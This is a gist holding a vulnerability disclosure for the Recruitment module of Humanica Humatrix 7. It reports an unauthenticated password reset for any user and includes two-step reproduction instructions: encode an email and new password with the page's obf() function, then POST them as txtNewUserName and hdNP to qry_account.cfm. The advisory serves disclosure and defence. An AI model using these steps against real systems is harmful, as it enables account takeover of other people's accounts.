Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
[Suggested description]
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681
allows an unauthenticated attacker to change the password of any user via the
recruitment_online/personalData/act_acounttab.cfm
txtNewUserName and hdNP fields.
------------------------------------------
[Additional Information]
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681
allows an unauthenticated attacker to change password any user.
Step 1 :
For change password need to have hdNP parameter
Can use function obf() on the https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/act_acounttab.cfm
for generate hdNP parameter and encode is obf(email+new_password)
Step 2 :
POST To https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/qry_account.cfm
POST Body
Content-Disposition: form-data; name="txtNewUserName"
{E-mail}
Content-Disposition: form-data; name="hdNP"
{encode newpassword}
------------------------------------------
[Vulnerability Type]
Insecure Permissions
------------------------------------------
[Vendor of Product]
Humanica
------------------------------------------
[Affected Product Code Base]
Humatrix 7 - 1.0.0.203, 1.0.0.681
------------------------------------------
[Affected Component]
Recruitment module
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[CVE Impact Other]
Unauthorized change password
------------------------------------------
[Attack Vectors]
Unauthorized change password
------------------------------------------
[Reference]
https://www.humatrix7.com/sunfish5/ehrm/humanica/recruitment_online/personalData/qry_account.cfm
------------------------------------------
[Discoverer]
Suphaphol Tanalertphan
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.